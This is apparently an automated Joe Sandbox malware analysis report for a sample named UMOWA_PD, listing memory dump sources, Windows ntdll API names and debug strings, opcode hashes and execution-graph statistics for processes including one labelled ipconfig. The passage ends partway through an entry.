                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: HEAP:
                                                                                    • API String ID: 3446177414-2466845122

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 33D04507
                                                                                    • Execute=1, xrefs: 33D0451E
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 33D04592
                                                                                    • ExecuteOptions, xrefs: 33D044AB
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 33D04530
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 33D04460
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 33D0454D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33CF77E2
                                                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33CF7807
                                                                                    • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 33CF78F3
                                                                                    • SsHd, xrefs: 33CAA304
                                                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 33CF77DD, 33CF7802
                                                                                    • Actx , xrefs: 33CF7819, 33CF7880
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                    • API String ID: 0-1988757188

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33CF9153
                                                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33CF9178
                                                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 33CF914E, 33CF9173
                                                                                    • Actx , xrefs: 33CF9315
                                                                                    • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 33CF9372
                                                                                    • GsHd, xrefs: 33CAD794
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                    • API String ID: 3446177414-2196497285
                                                                                    APIs
                                                                                    • RtlDebugPrintTimes.NTDLL ref: 33C8651C
                                                                                      • Part of subcall function 33C86565: RtlDebugPrintTimes.NTDLL ref: 33C86614
                                                                                      • Part of subcall function 33C86565: RtlDebugPrintTimes.NTDLL ref: 33C8665F
                                                                                    Strings
                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 33CE9790
                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 33CE97B9
                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 33CE977C
                                                                                    • LdrpInitShimEngine, xrefs: 33CE9783, 33CE9796, 33CE97BF
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 33CE97A0, 33CE97C9
                                                                                    • apphelp.dll, xrefs: 33C86446
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 3446177414-204845295
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                    • API String ID: 3446177414-4227709934
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                    • API String ID: 3446177414-3492000579
                                                                                    APIs
                                                                                    Strings
                                                                                    • LdrpLoadShimEngine, xrefs: 33CE984A, 33CE988B
                                                                                    • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33CE9843
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 33CE9854, 33CE9895
                                                                                    • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33CE9885
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 3446177414-3589223738
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                    • API String ID: 3446177414-3224558752
                                                                                    APIs
                                                                                    Strings
                                                                                    • HEAP: , xrefs: 33D3ECDD
                                                                                    • ---------------------------------------, xrefs: 33D3EDF9
                                                                                    • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 33D3EDE3
                                                                                    • Entry Heap Size , xrefs: 33D3EDED
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                    • API String ID: 3446177414-1102453626
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                    • API String ID: 3446177414-1222099010
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $$@
                                                                                    • API String ID: 3446177414-1194432280
                                                                                    APIs
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 33D0344A, 33D03476
                                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 33D03466
                                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 33D03439
                                                                                    • LdrpFindDllActivationContext, xrefs: 33D03440, 33D0346C
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                    • API String ID: 3446177414-3779518884
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 3446177414-3610490719
                                                                                    APIs
                                                                                    Strings
                                                                                    • LdrpCheckModule, xrefs: 33CF9F24
                                                                                    • Failed to allocated memory for shimmed module list, xrefs: 33CF9F1C
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 33CF9F2E
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 3446177414-161242083
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0$Flst
                                                                                    • API String ID: 0-758220159
                                                                                    • Opcode ID: ff778c8ad92cc713c5685178a2544cb5865743f97398152009942e9437534485
                                                                                    • Instruction ID: 3175842f89850dc062bc8a1ac808b16ef5bbf04058b52adcfa06a59f9e3c5b26
                                                                                    • Opcode Fuzzy Hash: ff778c8ad92cc713c5685178a2544cb5865743f97398152009942e9437534485
                                                                                    • Instruction Fuzzy Hash: DB516BB5E007888BEB26CF95C484699FBF8FF44B95F18C069D046DB654EB709986CB80
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: 0$0
                                                                                    • API String ID: 3446177414-203156872
                                                                                    • Opcode ID: 609a8957354230790836e780f6ad2610bd4726a7555b783ac6b7bdc752d41eb9
                                                                                    • Instruction ID: d5b6978df5c3cde4ee9cafe8f76818d240112cd8ad49cabb4578e2d81ce2dcae
                                                                                    • Opcode Fuzzy Hash: 609a8957354230790836e780f6ad2610bd4726a7555b783ac6b7bdc752d41eb9
                                                                                    • Instruction Fuzzy Hash: 4F415DB6A087029FD300CF28C854A5ABBE4BF89358F04496EF588DF750D771EA45CB96

                                                                                    Execution Graph

                                                                                    Execution Coverage:0.2%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:9
                                                                                    Total number of Limit Nodes:1
                                                                                    execution_graph 64420 3262b20 64422 3262b2a 64420->64422 64423 3262b31 64422->64423 64424 3262b3f LdrInitializeThunk 64422->64424 64426 32629f0 LdrInitializeThunk 64441 30ef177 64442 30ef18c 64441->64442 64443 30ef1a9 NtQueryInformationProcess 64442->64443 64444 30ef1e3 64443->64444

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • NtQueryInformationProcess.NTDLL ref: 030EF1C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061858287.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_30e0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InformationProcessQuery
                                                                                    • String ID: 0
                                                                                    • API String ID: 1778838933-4108050209
                                                                                    • Opcode ID: 219a842e0bafdb5871df4d554e028e84cf6f2513721f5c6492a0015cbdede274
                                                                                    • Instruction ID: f7ac9a9f36bec08450720541f4d155e47f61f59ac56697deea23a0805c974b53
                                                                                    • Opcode Fuzzy Hash: 219a842e0bafdb5871df4d554e028e84cf6f2513721f5c6492a0015cbdede274
                                                                                    • Instruction Fuzzy Hash: 6EE13974619B8C8FCBA5EF68C894AEE77A1FB99300F00062AD94ADB644DF34D6418B41
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 229502030aa41f4dbbcb95347de560dec0e63287d32aa904b05f49a37d7475e5
                                                                                    • Instruction ID: 7b63961e580cac2c165017d870769d636a651f86f25a3796dbdc18aa4250270b
                                                                                    • Opcode Fuzzy Hash: 229502030aa41f4dbbcb95347de560dec0e63287d32aa904b05f49a37d7475e5
                                                                                    • Instruction Fuzzy Hash: B0900231615418129640B15859895464046A7E0301B51C415E0514554CDB3489966361
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ffa0089bf97d16632ae3a66f148448205a15536641be0639e4da2574c2b5d7fa
                                                                                    • Instruction ID: 9a28bb96798b6338f49b8759595b578f22ad5593f670fde7d50242944b39542a
                                                                                    • Opcode Fuzzy Hash: ffa0089bf97d16632ae3a66f148448205a15536641be0639e4da2574c2b5d7fa
                                                                                    • Instruction Fuzzy Hash: 6F900261611118424640B15859094066046A7E1301391C519A0644560CD7388895A269
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 2a4dbdd6bf100dc3dd519b593e70a177073a18216203accd2f2c7fa9d953633e
                                                                                    • Instruction ID: f4fc020625df3f3b885df6b68b6e2bec320c9dcd33d0b0ea6987384c14dce800
                                                                                    • Opcode Fuzzy Hash: 2a4dbdd6bf100dc3dd519b593e70a177073a18216203accd2f2c7fa9d953633e
                                                                                    • Instruction Fuzzy Hash: 5590023161511C02D600A1585619706104697D0201F61C815A0514568DD7B5899175A2

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 118 3262b80-3262b8c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 24b6a8e4c1b326fcfb308e0d68336ee228775c96def9b6f5db43add2bc585bbc
                                                                                    • Instruction ID: 5ab381ebff2d01b09a31775f9316a3783fcb584043f5dd89395dd488af6f3e26
                                                                                    • Opcode Fuzzy Hash: 24b6a8e4c1b326fcfb308e0d68336ee228775c96def9b6f5db43add2bc585bbc
                                                                                    • Instruction Fuzzy Hash: 0390023121101C42D600A1585509B46004697E0301F51C41AA0214654DD735C8917521

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 119 3262b90-3262b9c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 8711e98ecc01b28cf6da954f6ea1ca1acfd70cf9860aa6f5fdcc249b908dc3df
                                                                                    • Instruction ID: 1b933ce5e24f82370ae45ab9d9aeb16e28b0dfc5117a9d02c6bf5ee83aa963d0
                                                                                    • Opcode Fuzzy Hash: 8711e98ecc01b28cf6da954f6ea1ca1acfd70cf9860aa6f5fdcc249b908dc3df
                                                                                    • Instruction Fuzzy Hash: AE90023121109C02D610A158950974A004697D0301F55C815A4514658DD7B588D17121

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 120 3262bc0-3262bcc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ba2f2aef59f1d044efaedaa78c469591f73463bc1ead99836d79470a4ffd89c7
                                                                                    • Instruction ID: cf6c8e6da875c0240f32b70ef3e67f96e105231e35853c1395898e7422be3723
                                                                                    • Opcode Fuzzy Hash: ba2f2aef59f1d044efaedaa78c469591f73463bc1ead99836d79470a4ffd89c7
                                                                                    • Instruction Fuzzy Hash: B090023121101C02D600A598650D646004697E0301F51D415A5114555ED77588D17131

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 116 3262a10-3262a1c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 53e4b5874f6474595f7e90edc5c740f9dd6dadac2737856d4197f5c254521e41
                                                                                    • Instruction ID: 3a1e7b2f4327409d76bd5ba57923e87e63da9712cd1c908da65171b8d9478478
                                                                                    • Opcode Fuzzy Hash: 53e4b5874f6474595f7e90edc5c740f9dd6dadac2737856d4197f5c254521e41
                                                                                    • Instruction Fuzzy Hash: 45900225231018020645E558170950B0486A7D6351391C419F1506590CD73188A56321

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 117 3262a80-3262a8c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0aa2679b2f55c449ba1eb9f862a36d4bf622a3a91f7ebe0e179e57c52921c6f6
                                                                                    • Instruction ID: 1ba7d85badf14c1a2d713598728ac7b9e00bd8d3adf76d97198613466da786a0
                                                                                    • Opcode Fuzzy Hash: 0aa2679b2f55c449ba1eb9f862a36d4bf622a3a91f7ebe0e179e57c52921c6f6
                                                                                    • Instruction Fuzzy Hash: 18900261212018034605B1585519616404B97E0201B51C425E1104590DD63588D17125

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 115 32629f0-32629fc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a6403b4fd3ced86340f24290c7ed203beebf59ddfa2dabf15862e4b01389c200
                                                                                    • Instruction ID: 45b0df738a355f98516515f8a0ccc1b3caa38efc90c402fe6597edd86e67ff92
                                                                                    • Opcode Fuzzy Hash: a6403b4fd3ced86340f24290c7ed203beebf59ddfa2dabf15862e4b01389c200
                                                                                    • Instruction Fuzzy Hash: F3900225221018030605E5581709507008797D5351351C425F1105550CE73188A16121
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 9fa0f60064bf4b4c79933d1fc6eff7406c9ab2e94347dca6594c4a9f6a087aaa
                                                                                    • Instruction ID: 23f34ac69899691c4ab1c4583e42587a382f4a82d254447e2319737bc3f7cac7
                                                                                    • Opcode Fuzzy Hash: 9fa0f60064bf4b4c79933d1fc6eff7406c9ab2e94347dca6594c4a9f6a087aaa
                                                                                    • Instruction Fuzzy Hash: 0390022125506902D650B15C55096164046B7E0201F51C425A0904594DD67588957221
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 125 3262e00-3262e0c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 126 3262e50-3262e5c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 127 3262ed0-3262edc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
